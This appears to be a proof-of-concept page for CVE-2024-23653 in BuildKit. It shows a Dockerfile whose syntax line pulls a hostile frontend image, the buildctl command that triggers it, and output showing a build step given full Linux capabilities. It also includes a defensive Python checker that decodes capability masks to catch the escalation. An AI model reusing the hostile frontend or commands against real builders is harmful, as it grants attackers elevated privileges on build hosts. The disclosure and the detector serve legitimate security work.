
CVE-2024-23653 PoC — BuildKit interactive containers API does not validate entitlements check

Associated Vulnerability
Title: BuildKit interactive containers API does not validate entitlements check (CVE-2024-23653)
Description: BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if the special `security.insecure` entitlement is enabled both by the buildkitd configuration and allowed by the user initializing the build request. The issue has been fixed in v0.12.5. Avoid using BuildKit frontends from untrusted sources.
Readme
```dockerfile
#syntax=docker.io/zdfa/evilerfile
# The syntax directive above makes buildkitd pull this image and run it as the
# Dockerfile frontend in place of the built-in one.
FROM alpine
# Print the capability sets the build step actually received.
RUN grep Cap /proc/self/status
```

```shell
sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
```

```
➜  cp sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
[+] Building 5.3s (6/6) FINISHED
 => [internal] load .dockerignore                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                        0.0s
 => [internal] load build definition from Dockerfile                                                                                                                                   0.0s
 => => transferring dockerfile: 114B                                                                                                                                                   0.0s
 => resolve image config for docker.io/zdfa/evilerfile:latest                                                                                                                          1.0s
 => CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                            0.0s
 => => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                                       0.0s
 => docker-image://docker.io/library/alpine:latest                                                                                                                                     4.0s
 => => resolve docker.io/library/alpine:latest                                                                                                                                         4.0s
 => [auth] library/alpine:pull token for registry-1.docker.io                                                                                                                          0.0s
Dockerfile:1
--------------------
   1 | >>> #syntax=docker.io/zdfa/evilerfile
   2 |     FROM alpine
   3 |     RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
% exit 99

: exit code: 99
^[[44;3R%
```

```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine as sandbox
RUN grep Cap /proc/self/status
```
```shell
➜  cp sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
[+] Building 2.8s (7/7) FINISHED
 => [internal] load build definition from Dockerfile                                                                                                                                   0.1s
 => => transferring dockerfile: 125B                                                                                                                                                   0.0s
 => [internal] load .dockerignore                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                        0.0s
 => resolve image config for docker.io/zdfa/evilerfile:latest                                                                                                                          2.0s
 => [auth] zdfa/evilerfile:pull token for registry-1.docker.io                                                                                                                         0.0s
 => CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                            0.0s
 => => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                                       0.0s
 => CACHED docker-image://docker.io/library/alpine:latest                                                                                                                              0.5s
 => => resolve docker.io/library/alpine:latest                                                                                                                                         0.5s
 => [auth] library/alpine:pull token for registry-1.docker.io                                                                                                                          0.0s
Dockerfile:1
--------------------
   1 | >>> #syntax=docker.io/zdfa/evilerfile
   2 |     FROM alpine as sandbox
   3 |     RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
% exit 99

: exit code: 99
^[[44;3R%
```
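The two builds above differ only in the `Cap*` masks the `RUN` step prints: the first run shows `000001ffffffffff` in every set, the second shows `00000000a80425fb` in the permitted, effective and bounding sets and zero elsewhere. The following Python is an added example, not code from the PoC repository, that decodes those masks into capability names and flags anything beyond the ordinary container set. It assumes the standard Linux capability numbering from `include/uapi/linux/capability.h`, and takes the second run's `CapEff` value as the baseline for a non-privileged build step; the `/proc/self/status` excerpts are constructed from the output shown on this page.

```python
"""Decode the Cap* lines of /proc/<pid>/status and flag capability sets that
exceed the ordinary container default. Added example; not part of the PoC."""
import re

# Linux capability numbers, bit index -> name (include/uapi/linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

# Baseline: the CapEff mask the second (non-privileged) build step printed.
# Assumption: this is the ordinary set a RUN step gets without security.insecure.
DEFAULT_MASK = 0x00000000A80425FB

# Constructed /proc/self/status excerpts, copied from the two runs above.
PRIVILEGED_STATUS = """\
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
"""
DEFAULT_STATUS = """\
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
"""

_CAP_LINE = re.compile(r"^(Cap(?:Inh|Prm|Eff|Bnd|Amb)):\s*([0-9a-fA-F]+)", re.M)


def parse_status(text):
    """Return {'CapInh': int, 'CapPrm': int, ...} from status-file text."""
    return {m.group(1): int(m.group(2), 16) for m in _CAP_LINE.finditer(text)}


def mask_to_names(mask):
    """Expand a capability bitmask into capability names, lowest bit first."""
    names = []
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            # Unknown high bits (newer kernels) are reported by number.
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_{bit}")
        bit += 1
    return names


def excess_caps(text, baseline=DEFAULT_MASK):
    """Capabilities in CapEff that are not in the baseline set.

    An empty list means the step ran with the ordinary container set; any
    entry means the step executed with elevated privileges."""
    eff = parse_status(text).get("CapEff", 0)
    return mask_to_names(eff & ~baseline)


if __name__ == "__main__":
    for label, status in (("run 1", PRIVILEGED_STATUS), ("run 2", DEFAULT_STATUS)):
        extra = excess_caps(status)
        verdict = "ELEVATED" if extra else "ordinary"
        print(f"{label}: {verdict}, {len(extra)} extra capabilities")
        if extra:
            print("  " + ", ".join(extra))
```

Run against the first transcript it reports 27 capabilities beyond the baseline, `CAP_SYS_ADMIN`, `CAP_SYS_MODULE` and `CAP_SYS_PTRACE` among them, which is what a fully privileged container looks like; the second transcript decodes to the 14-capability default set with nothing extra. A CI job that captures `/proc/self/status` from a build step can use `excess_caps` as a guard: a non-empty result on a build that never requested `security.insecure` means the builder or a frontend granted privileges it should not have.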
File Snapshot

```
[4.0K] /data/pocs/6e5d3c5a164d484fedd9fc607728ae3ce55938f0
├── [4.0K] cmd
│   └── [4.0K] eviler
│       └── [3.8K] main.go
├── [ 300] Dockerfile
├── [ 122] go.mod
├── [322K] go.sum
└── [5.4K] README.md

2 directories, 5 files
```